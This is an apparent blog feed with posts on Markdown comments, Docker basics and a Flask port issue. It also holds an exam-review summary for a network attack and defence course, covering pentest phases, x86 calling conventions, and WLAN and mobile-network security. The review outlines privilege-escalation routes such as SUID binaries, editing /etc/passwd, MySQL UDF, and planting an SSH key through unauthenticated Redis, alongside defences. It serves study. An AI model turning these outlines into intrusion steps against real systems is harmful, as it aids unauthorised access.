<figure class="highlight xml"><table><tr><td class="code"><pre><span class="line"><span class="tag"><<span class="name">div</span> <span class="attr">style</span>=<span class="string">'display: none'</span>></span></span><br><span class="line">注释0</span><br><span class="line"><span class="tag"></<span class="name">div</span>></span></span><br></pre></td></tr></table></figure>
<ul><li><strong>HTML comments</strong></li></ul>
<p>Since HTML syntax is supported, HTML comments are supported as well; keyboard shortcut: comment + /.</p>
<figure class="highlight xml"><table><tr><td class="code"><pre><span class="line"><span class="comment"><!-- comment 1 --></span></span><br><span class="line"></span><br><span class="line"><span class="comment"><!--</span></span><br><span class="line"><span class="comment">multi-line comment,</span></span><br><span class="line"><span class="comment">2</span></span><br><span class="line"><span class="comment"> --></span></span><br></pre></td></tr></table></figure>
<ul><li><strong>Hack approach</strong></li></ul>
<p>The hack approach relies on how Markdown is parsed to produce a comment.<br> Some Markdown parsers do not support the comment methods above; in that case the hack approach can be used.<br> It is far more robust than the two methods above, but its semantics are poor.</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">[//]: # (Ha, I'm the strongest comment; I won't show up in the browser.)</span><br><span class="line">[^_^]: # (Ha, I'm the cutest comment; I won't show up in the browser.)</span><br><span class="line">[//]: <> (Ha, I'm a comment; I won't show up in the browser.)</span><br><span class="line">[comment]: <> (Ha, I'm a comment; I won't show up in the browser.)</span><br></pre></td></tr></table></figure>
<p><a href="https://www.jianshu.com/p/ebe52d2d468f" target="_blank" rel="noopener">Reference: 择势勤</a></p>
<hr>
<p>Emoji reference:</p>
<p><a href="https://www.webfx.com/tools/emoji-cheat-sheet/" target="_blank" rel="noopener">https://www.webfx.com/tools/emoji-cheat-sheet/</a></p>
<p>:blue_heart: :heart::purple_heart:</p>
<p>:relaxed:</p>
<p><a href="https://markdown.com.cn/" target="_blank" rel="noopener">Markdown syntax tutorial</a></p>]]></content>
<summary type="html">
</summary>
<category term="notes" scheme="https://singlemindedt.github.io/tags/notes/"/>
</entry>
<entry>
<title>Docker-notes1</title>
<link href="https://singlemindedt.github.io/2020/07/31/Docker-notes1/"/>
<id>https://singlemindedt.github.io/2020/07/31/Docker-notes1/</id>
<published>2020-07-31T05:14:01.000Z</published>
<updated>2020-07-31T15:56:47.392Z</updated>
<content type="html"><![CDATA[<blockquote><p>Enjoy digging into things and sharing;</p></blockquote>
<blockquote><p>As long as learning doesn't kill you, learn as if it would;</p></blockquote>
<h1 id="概念"><a href="#概念" class="headerlink" title="Concepts"></a>Concepts</h1>
<blockquote><p>Problems:</p><ul><li>"It runs on my machine???"</li><li>Configuring an application environment is tedious and not portable across platforms</li></ul></blockquote>
<p><strong>Package the project together with its environment (an image) -> (Docker registry = store) -> download the image we published and run it directly!</strong></p>
<p>Origin of the idea: shipping containers.<br>With a shared JRE, multiple applications (port conflicts) get tangled together;<br>the core is isolation: every container is isolated from the others, and this isolation mechanism lets the server be used to the fullest!</p>]]></content>
<summary type="html">
</summary>
<category term="notes" scheme="https://singlemindedt.github.io/tags/notes/"/>
</entry>
<entry>
<title>pycharm开发flask指定ip、端口无效</title>
<link href="https://singlemindedt.github.io/2020/06/21/pycharm%E5%BC%80%E5%8F%91flask%E6%8C%87%E5%AE%9Aip%E3%80%81%E7%AB%AF%E5%8F%A3%E6%97%A0%E6%95%88/"/>
<id>https://singlemindedt.github.io/2020/06/21/pycharm开发flask指定ip、端口无效/</id>
<published>2020-06-20T16:16:09.000Z</published>
<updated>2020-06-20T16:17:18.697Z</updated>
<content type="html"><![CDATA[<p><a href="https://blog.csdn.net/JENREY/article/details/86699817?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.nonecase&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.nonecase" target="_blank" rel="noopener">The specified IP and port have no effect when developing Flask in PyCharm</a></p>
<p><a href="https://www.cnblogs.com/xiaodai0/p/10460751.html" target="_blank" rel="noopener">python: the Flask project's port setting has no effect</a></p>]]></content>
<summary type="html">
</summary>
<category term="flask" scheme="https://singlemindedt.github.io/tags/flask/"/>
</entry>
<entry>
<title>网络攻击与防御复习</title>
<link href="https://singlemindedt.github.io/2020/06/12/%E7%BD%91%E7%BB%9C%E6%94%BB%E5%87%BB%E4%B8%8E%E9%98%B2%E5%BE%A1%E5%A4%8D%E4%B9%A0%E7%9F%A5%E8%AF%86%E7%82%B9%E6%80%BB%E7%BB%93/"/>
<id>https://singlemindedt.github.io/2020/06/12/网络攻击与防御复习知识点总结/</id>
<published>2020-06-12T05:20:08.000Z</published>
<updated>2020-06-12T09:07:20.241Z</updated>
<content type="html"><![CDATA[<p>+++</p>
<p>1. Web security</p>
<p>2. Reverse-engineering security</p>
<p>3. Mobile communication security</p>
<h4 id="题型:"><a href="#题型:" class="headerlink" title="Question types:"></a><strong>Question types:</strong></h4>
<p><strong>Essay questions: 3*10</strong></p>
<p>(short-answer, memorization)</p>
<p><strong>Case-analysis question: 20</strong></p>
<p>(code-related web, or not code-related)</p>
<p><strong>Code-analysis questions: 20+30</strong></p>
<p>(20 Web / 30 RE)</p>
<p>+++</p>
<p>The web code questions mainly cover: <strong>PHP code</strong></p>
<p>+++</p>
<h3 id="1、代码审计与渗透测试的区别和优缺点"><a href="#1、代码审计与渗透测试的区别和优缺点" class="headerlink" title="1. Differences between code audit and penetration testing, and their pros and cons"></a>1. Differences between code audit and penetration testing, and their pros and cons</h3>
<p><font color="#ff000" face="黑体" size="4">☆☆☆</font></p>
<table><thead><tr><th></th><th>Penetration testing (threat: intrusion from outside)</th><th>Code audit (vulnerability: weaknesses in the system itself, its software, etc.)</th></tr></thead><tbody><tr><td>Description</td><td>Simulate a hacker's attack to assess the target system's security</td><td>Find insecure code in the program</td></tr><tr><td>Test target</td><td>Including but not limited to web applications</td><td>Look for vulnerabilities in the provided system source code</td></tr><tr><td>Deliverable</td><td>Penetration test report + remediation advice</td><td>Code audit report + remediation advice</td></tr><tr><td>Advantages</td><td>Close to real-world conditions; can be performed remotely</td><td>Comprehensive review, close to the system and its architecture; low remediation cost</td></tr><tr><td>Disadvantages</td><td>Incomplete coverage; high remediation cost</td><td>Must be done on site</td></tr></tbody></table>
<p>+++</p>
<h3 id="2、代码审计流程"><a href="#2、代码审计流程" class="headerlink" title="2. Code audit process"></a>2. Code audit process</h3>
<p>After obtaining the source code, first run a full scan with tooling, then manually confirm the findings in the scan results; in parallel, carry out a manual secure-coding review to address both common vulnerabilities and logic flaws. Finally, consolidate the audit results and write and submit the code audit report.</p>
<p>+++</p>
<h3 id="3、代码审计的通用方法"><a href="#3、代码审计的通用方法" class="headerlink" title="3. General code audit methods"></a>3. General code audit methods</h3>
<p>+++</p>
<h3 id="4、PHP代码审计:代码分析"><a href="#4、PHP代码审计:代码分析" class="headerlink" title="4. PHP code audit: code analysis"></a>4. PHP code audit: code analysis</h3>
<p><strong>(XSS, file upload, file inclusion, code execution, CSRF, etc.)</strong></p>
<p><font color="#ff000" face="黑体" size="4">Deserialization vulnerabilities ☆☆☆</font></p>
<p>+++</p>
<p>Review the penetration-testing case studies;</p>
<p>+++</p>
<h3 id="1、渗透测试的流程和每一步要做的工作"><a href="#1、渗透测试的流程和每一步要做的工作" class="headerlink" title="1. The penetration-testing process and the work in each step"></a>1. The penetration-testing process and the work in each step</h3>
<p>Penetration testing is divided into <strong>seven phases</strong>:</p>
<p>1. Pre-engagement interaction</p>
<p>2. Intelligence gathering</p>
<p>3. Threat modeling</p>
<p>4. Vulnerability analysis</p>
<p>5. Exploitation</p>
<p>6. Post-exploitation</p>
<p>7. Reporting</p>
<h4 id="1、前期交互阶段"><a href="#1、前期交互阶段" class="headerlink" title="1. Pre-engagement interaction"></a>1. Pre-engagement interaction</h4>
<ul><li>Agree the <strong>scope</strong> of the test (what may be tested) and its <strong>goals</strong> (the expected outcome)</li><li>The type of test (black box / white box)</li><li>Time window, cost, etc.</li></ul>
<blockquote><p>Goals:</p><ul><li>List all vulnerabilities</li><li>Prove that the various vulnerabilities exist</li><li>Test the response to various incidents</li><li>Develop exploitation modules for network, system or application vulnerabilities</li></ul></blockquote>
<h4 id="2、情报搜集阶段(最重要阶段之一,40-60-)"><a href="#2、情报搜集阶段(最重要阶段之一,40-60-)" class="headerlink" title="2. Intelligence gathering (one of the most important phases, 40-60%)"></a>2. Intelligence gathering (one of the most important phases, 40-60%)</h4>
<ul><li>Use every available means to <strong>collect information about the target network</strong></li><li>Rough steps:</li></ul>
<p>1. <strong>Target selection</strong>: choose the targets and determine the intended effect</p>
<p>2. <strong>Covert collection</strong>: on-site collection + external collection</p>
<p>3. <strong>Footprinting</strong>: active and passive scanning techniques</p>
<p>4. <strong>Verify the target's security mechanisms</strong>: firewalls, network traffic filtering, protective measures on the network and hosts</p>
<h4 id="3、威胁建模阶段"><a href="#3、威胁建模阶段" class="headerlink" title="3. Threat modeling"></a>3. Threat modeling</h4>
<ul><li>Model the threats to the target and their effects, and classify them by the impact they could have on the target system</li><li>Combine this with the analysis from the intelligence-gathering phase to determine the most effective attack approach</li><li>Questions to answer:</li></ul>
<blockquote><p>How would the given network be attacked?<br> What key information needs to be obtained?<br> Which attack method is most appropriate?<br> What is the greatest security threat to the target?</p></blockquote>
<p>(Vulnerability scanners such as Nexpose or Metasploit Pro can help automate and speed up threat modeling.)</p>
<h4 id="4、漏洞分析阶段"><a href="#4、漏洞分析阶段" class="headerlink" title="4. Vulnerability analysis"></a>4. Vulnerability analysis</h4>
<h4 id="5、渗透攻击阶段"><a href="#5、渗透攻击阶段" class="headerlink" title="5. Exploitation"></a>5. Exploitation</h4>
<ul><li>The exploitation phase <strong>builds on the results of the preceding vulnerability-analysis phase</strong>; it is <strong>the actual attack phase</strong></li></ul>
<h4 id="6、后渗透攻击阶段"><a href="#6、后渗透攻击阶段" class="headerlink" title="6. Post-exploitation"></a>6. Post-exploitation</h4>
<ul><li>Post-exploitation covers the many tasks that follow <strong>a successful compromise of the target machine</strong>, such as privilege escalation, uploading and downloading files, and pivoting</li></ul>
<p>(It targets specific business systems, identifies critical infrastructure, and looks for the assets most valuable to the client)</p>
<h4 id="7、报告阶段"><a href="#7、报告阶段" class="headerlink" title="7. Reporting"></a>7. Reporting</h4>
<p>Main components of the report:</p>
<ul><li><strong>Identify</strong> the <strong>most important threats</strong> to the target</li><li><strong>Present the data gathered during the test as tables and charts</strong></li><li><strong>Recommendations for improving</strong> the <strong>target system</strong></li><li>A <strong>remediation plan</strong> for the issues found</li></ul>
<p>+++</p>
<p>Must be described in your own words;</p>
<p>+++</p>
<h3 id="1、为什么要提权?"><a href="#1、为什么要提权?" class="headerlink" title="1. Why escalate privileges?"></a>1. Why escalate privileges?</h3>
<p><strong>Privilege escalation</strong>: exploiting <strong>program bugs</strong>, <strong>design flaws</strong> or <strong>misconfigurations</strong> in the operating system or application software to obtain <strong>elevated access</strong> to protected resources</p>
<ul><li>In the post-exploitation phase, a <strong>low-privilege shell</strong> on the target has been obtained, but <strong>some access is still restricted</strong></li><li>Privilege escalation is needed to <strong>obtain the highest privileges on the target system</strong></li></ul>
<p>+++</p>
<h3 id="2、提权的方法和步骤-不同操作系统下的提权技术"><a href="#2、提权的方法和步骤-不同操作系统下的提权技术" class="headerlink" title="2. Privilege-escalation methods and steps / techniques on different operating systems"></a>2. Privilege-escalation methods and steps / techniques on different operating systems</h3>
<h4 id="1、Windows系统提权的一般步骤"><a href="#1、Windows系统提权的一般步骤" class="headerlink" title="1. General steps for privilege escalation on Windows"></a>1. General steps for privilege escalation on Windows</h4>
<ul><li>Escalate via kernel vulnerabilities (MS13_053, etc.)</li><li>Escalate via operating-system vulnerabilities</li><li>Escalate via application vulnerabilities</li></ul>
<h4 id="2、Linux系统提权"><a href="#2、Linux系统提权" class="headerlink" title="2. Privilege escalation on Linux"></a>2. Privilege escalation on Linux</h4>
<ul><li>SUID binaries</li><li>Changing a user's group membership (badly configured file permissions)</li><li>Modifying /etc/passwd</li><li>Modifying the root user's SSH key</li><li>Wildcard abuse</li><li>Application vulnerabilities</li></ul>
<h4 id="3、数据库UDF提权"><a href="#3、数据库UDF提权" class="headerlink" title="3. Database UDF privilege escalation"></a>3. Database UDF privilege escalation</h4>
<p>UDF: User Defined Function</p>
<p>Prerequisites:</p>
<ol><li>The root account's password has been obtained</li><li>The database has plugins enabled</li><li>The database listens on a public interface</li></ol>
<h4 id="4、Redis提权(未授权访问等漏洞)"><a href="#4、Redis提权(未授权访问等漏洞)" class="headerlink" title="4. Redis privilege escalation (unauthenticated access and similar flaws)"></a>4. Redis privilege escalation (unauthenticated access and similar flaws)</h4>
<p>When Redis is started as root and also allows unauthenticated access, an attacker can connect to the database and write an SSH key, and then log in to the server as root.</p>
<p>+++</p>
<h3 id="3、提权的防御"><a href="#3、提权的防御" class="headerlink" title="3. Defending against privilege escalation"></a>3. Defending against privilege escalation</h3>
<ul><li>Apply patches promptly</li><li>Start web and DB services under a low-privilege account (principle of least privilege)</li><li>Have services listen only on 127.0.0.1 (never expose them on the public internet)</li></ul>
<p>+++</p>
<p>The last question is worth 30 points (RE: analyzing assembly; given high-level code, analyze it in assembly, or given a task, write the assembly; the stack-related assembly used in class)</p>
<p>Given assembly, explain what the code means and how it works;</p>
<p><strong>Calling conventions</strong>, the four common ones, and <strong>how the stack changes</strong>: draw the stack's evolution from the code;</p>
<p>(The heap is not examined.)</p>
<p>+++</p>
<h3 id="1、字节序"><a href="#1、字节序" class="headerlink" title="1. Byte order"></a>1. Byte order</h3>
<p><a href="https://www.k2zone.cn/?p=1911" target="_blank" rel="noopener">Function stack & EIP, EBP, ESP</a></p>
<ul><li><p>Why ebx, esi and edi are pushed onto the stack:</p><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">push ebx</span><br><span class="line">push esi</span><br><span class="line">push edi</span><br></pre></td></tr></table></figure><p>To preserve the registers' original values (they are saved on the stack). When the stack frame switches, the values certain registers held in the previous function must not be destroyed: there is only one copy of each register, and now that this function is using them it may change their values, which would leave the caller unable to resume correctly on return, so the original values are saved first.</p></li><li><p>rep stosd is a repeat instruction: it loops ecx times (14), storing the CCCCCCCC loaded into eax (why CC: to wipe the leftover garbage data; CC is the INT3 breakpoint opcode)</p><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">lea edi,dword ptr ss:[ebp-50] // lea loads the effective (offset) address</span><br><span class="line">mov ecx,14</span><br><span class="line">mov eax,CCCCCCCC</span><br><span class="line">rep stosd</span><br></pre></td></tr></table></figure></li><li><p>The ds segment (data segment);</p><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">mov al,byte ptr ds:[424A30]</span><br><span class="line">mov byte ptr ss:[ebp-4],al</span><br><span class="line">...</span><br><span class="line">...</span><br><span class="line">..</span><br><span class="line">..</span><br></pre></td></tr></table></figure></li></ul>
<p> Because data cannot be moved directly from memory to memory, the value is first loaded from memory into the CPU (a register) and then stored from the CPU onto the stack in memory.</p>
<ul><li>For string operations, what is passed is the string's address</li></ul>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">mov dword ptr ss:[ebp-10],zijixu.424A38:"abcde"</span><br></pre></td></tr></table></figure>
<ul><li>XOR operation</li></ul>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">xor eax,eax</span><br></pre></td></tr></table></figure>
<p>Zeroing; this corresponds to <code>return 0</code>. By default a function's return value is placed in eax, and the XOR sets it to zero;</p>
<blockquote><p>Why not zero it with <code>mov eax,0x0</code>?</p><p>Less efficient and takes more space</p></blockquote>
<ul><li>Restore the stack</li></ul>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">mov esp,ebp</span><br><span class="line">pop ebp</span><br></pre></td></tr></table></figure>
<ul><li>Pop the address at the top of the stack into EIP</li></ul>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">ret</span><br></pre></td></tr></table></figure>
<p>+++</p>
<p>ecx is pushed, so the value at the top of the stack (esp) is now ecx's value; everything printed afterwards should therefore be the value of ecx;</p>
<p>+++</p>
<h3 id="2、汇编基础(给定代码能说明其含义)"><a href="#2、汇编基础(给定代码能说明其含义)" class="headerlink" title="2. Assembly basics (be able to explain what given code does)"></a>2. Assembly basics (be able to explain what given code does)</h3>
<p>+++</p>
<h3 id="3、调用约定(相关的汇编代码分析和栈的变化情况)"><a href="#3、调用约定(相关的汇编代码分析和栈的变化情况)" class="headerlink" title="3. Calling conventions (analysis of the related assembly and of how the stack changes)"></a>3. Calling conventions (analysis of the related assembly and of how the stack changes)</h3>
<p><font color="#ff000" face="黑体" size="4">☆☆☆</font></p>
<p><strong>Stack frame</strong>: a block of memory allocated on the stack while the program runs, dedicated to one particular function call</p>
<p>Rough structure of a stack frame:</p>
<p>Steps when a function is called:</p>
<ol><li>The caller places the parameters the callee needs in the locations specified by the calling convention the function uses</li><li>The caller transfers control to the callee (call); the return address is saved on the program stack or in a CPU register</li><li>The callee allocates space for its local variables</li><li>The callee performs its work</li><li>The callee finishes and releases the stack space used by its locals</li><li>The callee returns control to the caller (ret)</li></ol>
<p>+++</p>
<h4 id="cdecl☆☆☆"><a href="#cdecl☆☆☆" class="headerlink" title="cdecl☆☆☆"></a>cdecl<font color="#ff000" face="黑体" size="4">☆☆☆</font></h4>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">add esp,10h // the caller cleans the stack (the caller adjusts the stack frame): esp+10h; since the stack grows in memory from high addresses toward low ones, adding 16 to the stack top esp shrinks the stack</span><br><span class="line"></span><br><span class="line">1. Last in, first out.</span><br><span class="line">2. In memory it grows from high addresses toward low addresses (pushes move from high -> low).</span><br><span class="line">3. Stack top esp: the top of the stack (the low-address end).</span><br><span class="line">4. Stack base ebp: the bottom of the stack (the high-address end).</span><br></pre></td></tr></table></figure>
<p>+++</p>
<h4 id="stdcall"><a href="#stdcall" class="headerlink" title="stdcall"></a>stdcall</h4>
<p>Opening the callee:</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">retn 10h // the callee cleans the stack (the callee adjusts the stack frame): ret first pops the return address into EIP, then does the equivalent of add esp,10h</span><br><span class="line">Fixed number of parameters</span><br></pre></td></tr></table></figure>
<p>+++</p>
<h4 id="fastcall"><a href="#fastcall" class="headerlink" title="fastcall"></a>fastcall</h4>
<p>Caller:</p>
<p>Callee:</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">mov [ebp+var_C],edx</span><br><span class="line">mov [ebp+var_8],ecx</span><br><span class="line">// save the values passed in the registers so that later code using those registers does not change them</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">retn 8 // the callee cleans the stack (the callee adjusts the stack frame): ret first pops the return address into EIP, then does the equivalent of add esp,8</span><br></pre></td></tr></table></figure>
<p>+++</p>
<h4 id="thiscall"><a href="#thiscall" class="headerlink" title="thiscall"></a>thiscall</h4>
<p>The object lives on the heap, not on the stack;</p>
<p>Caller:</p>
<p>ecx holds this, the pointer to the object the method is being called on;</p>
<p>eax holds the return value by default;</p>
<p>Callee:</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">lea ecx,[ebp+var_4] // obtain the this pointer</span><br><span class="line"></span><br><span class="line">retn 8 // the callee cleans the stack (the callee adjusts the stack frame): ret first pops the return address into EIP, then does the equivalent of add esp,8</span><br></pre></td></tr></table></figure>
<p>+++</p>
<h3 id="4、简单的软件保护技术举例"><a href="#4、简单的软件保护技术举例" class="headerlink" title="4. Examples of simple software-protection techniques"></a>4. Examples of simple software-protection techniques</h3>
<p>+++</p>
<h3 id="5、Windows的内核原理"><a href="#5、Windows的内核原理" class="headerlink" title="5. Windows kernel principles"></a>5. Windows kernel principles</h3>
<p>+++</p>
<p>Changes over the course of its development;</p>
<p>+++</p>
<h3 id="1、移动网络的分类和安全风险"><a href="#1、移动网络的分类和安全风险" class="headerlink"
title="1、移动网络的分类和安全风险"></a>1、移动网络的分类和安全风险</h3><p>分类:</p><p>无线局域网(WLAN)、无线个域网(WPAN)、无线体域网(WBAN)、无线城域网(WMAN)、无线广域网(WWAN)</p><p>安全风险:</p><ul><li>有线网络</li><li>无线网络</li></ul><p>+++</p><h3 id="2、WLAN安全机制—-WEP,IEEE-802-11i-WPA、WPA2、CCMP、TKIP、认证密钥交换、四步握手等"><a href="#2、WLAN安全机制—-WEP,IEEE-802-11i-WPA、WPA2、CCMP、TKIP、认证密钥交换、四步握手等" class="headerlink" title="2、WLAN安全机制—-WEP,IEEE 802.11i(WPA、WPA2、CCMP、TKIP、认证密钥交换、四步握手等)"></a>2、WLAN安全机制—-WEP,IEEE 802.11i(WPA、WPA2、CCMP、TKIP、认证密钥交换、四步握手等)</h3><h4 id="1、WEP"><a href="#1、WEP" class="headerlink" title="1、WEP"></a>1、WEP</h4><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C10.png" alt="3"></p><p>+++</p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C11.png" alt="3"></p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C12.png" alt="3"></p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C13.png" alt="3"></p><p>WEP的安全问题:</p><ul><li>RC4算法的使用(存在大量弱密钥;每256个密钥就有一个;建议:抛弃RC4输出的前256比特)</li><li>Ⅳ的使用(空间太小,生日攻击)</li><li>SK的产生与分发(无密钥交换/管理机制)</li><li>CRC32算法的使用(CRC32是线性的)</li><li>无抗重放攻击</li></ul><p>+++</p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C14.png" alt="3"></p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C15.png" alt="3"></p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C16.png" alt="3"></p><h4 id="2、IEEE-802-11i"><a href="#2、IEEE-802-11i" class="headerlink" title="2、IEEE 802.11i"></a>2、IEEE 
802.11i</h4><ul><li>TSN(过度安全网络)</li><li>RSN(坚固安全网络)</li></ul><h4 id="3、WPA"><a href="#3、WPA" class="headerlink" title="3、WPA"></a>3、WPA</h4><p>802.11i草案中一部分;</p><h4 id="4、加密机制TKIP—(暂时密钥完整性协议)"><a href="#4、加密机制TKIP—(暂时密钥完整性协议)" class="headerlink" title="4、加密机制TKIP—(暂时密钥完整性协议)"></a>4、加密机制TKIP—(暂时密钥完整性协议)</h4><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C17.png" alt="3"></p><h4 id="5、加密机制CCMP—基于AES"><a href="#5、加密机制CCMP—基于AES" class="headerlink" title="5、加密机制CCMP—基于AES"></a>5、加密机制CCMP—基于AES</h4><p><font color="#ff000" face="黑体" size="4">CCMP☆☆☆</font></p><p>+++</p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C18.png" alt="3"></p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C19.png" alt="3"></p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C20.png" alt="3"></p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C21.png" alt="3"></p><p>+++</p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C22.png" alt="3"></p><p>+++</p><h3 id="3、移动通信安全机制—-GSM、3G、4G"><a href="#3、移动通信安全机制—-GSM、3G、4G" class="headerlink" title="3、移动通信安全机制—-GSM、3G、4G"></a>3、移动通信安全机制—-GSM、3G、4G</h3><h4 id="1、GSM"><a href="#1、GSM" class="headerlink" title="1、GSM"></a>1、GSM</h4><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C23.png" 
alt="3"></p><p>+++</p><p>GSM系统的安全目标:</p><ul><li>用户身份认证:保证网络不被未授权者使用</li><li>数据机密性:</li><li>用户身份(IMSI)保密:<ul><li>IMSI(国际移动用户标识)不被泄露给未授权的个人、实体或过程</li></ul></li></ul><p>+++</p><p><strong>GSM安全分析</strong>:</p><ul><li>认证:挑战—-响应,长期密钥没有泄露</li><li>加密:空中接口(即用户到基站部分)</li><li>匿名:TMSI</li></ul><p><strong>GSM的不足</strong>:</p><ul><li>认证:单向认证,且三元组可无限期使用</li><li>加密:没有实现端到端的加密</li><li>完整性:无</li></ul><p>+++</p><h4 id="2、3G☆☆☆认证和密钥协商过程"><a href="#2、3G☆☆☆认证和密钥协商过程" class="headerlink" title="2、3G☆☆☆认证和密钥协商过程"></a>2、3G<font color="#ff000" face="黑体" size="4">☆☆☆认证和密钥协商过程</font></h4><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C53.png" alt="3"></p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C24.png" alt="3"></p><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C25.png" alt="3"></p><p>+++</p><ul><li><p>3G的安全目标:</p><ul><li><p>对用户模块(UE)进行<strong>认证</strong>,特别是用户服务标识模块(USIM)</p></li><li><p>向UE和服务网络SN提供<strong>会话密钥</strong></p></li><li><p>在会话密钥的保护下在UE和SN之间<strong>建立安全连接</strong></p></li></ul></li></ul><ul><li><p><strong>3G的层次</strong>:</p><ol><li>应用层</li><li>归属/服务层</li><li>传输层</li></ol></li></ul><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C26.png" alt="3"></p><p>+++</p><ul><li>3G安全功能结构</li></ul><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C27.png" alt="3"></p><ul><li>增强用户身份保密EUIC( Enhanced User Identity Confidentiality):通过归属网对移动用户智能卡身份信息进行认证</li><li>用户身份保密UIC( User Identity Confidentiality)</li><li>认证和密钥协商AKA( Authentication& Key 
agreement):用于USIM卡、VLR、HLR间进行双向认证和密钥分发</li><li>用户及信令数据保密DC:加密UE与RNC间信息</li><li>消息认证DI:认证消息的完整性、时效以及消息的来源地与目的地</li></ul><p>+++</p><h4 id="3、4G"><a href="#3、4G" class="headerlink" title="3、4G"></a>3、4G</h4><ul><li><p><strong>4G系统的组成:</strong></p><ul><li><p>移动终端</p></li><li><p>无线接入网</p></li><li><p>无线核心网</p></li><li><p>IP骨干网</p></li></ul></li></ul><ul><li>4G的安全威胁<ul><li>现有的无线网络和Internet的安全威胁依然存在<ul><li>4G的终端与各种应用的交互更为复杂,威胁也越多</li></ul></li></ul></li></ul><p><img src="C:%5CUsers%5CSmtSec%5CDesktop%5C%E7%BD%91%E7%BB%9C%E6%94%BB%E9%98%B2%E5%AE%9E%E8%B7%B5%5C%E5%A4%8D%E4%B9%A0%5C%E5%9B%BE%5C28.png" alt="3"></p>]]></content>
<summary type="html">
<p>[TOC]</p>
<p>+++</p>
<p>1、Web安全</p>
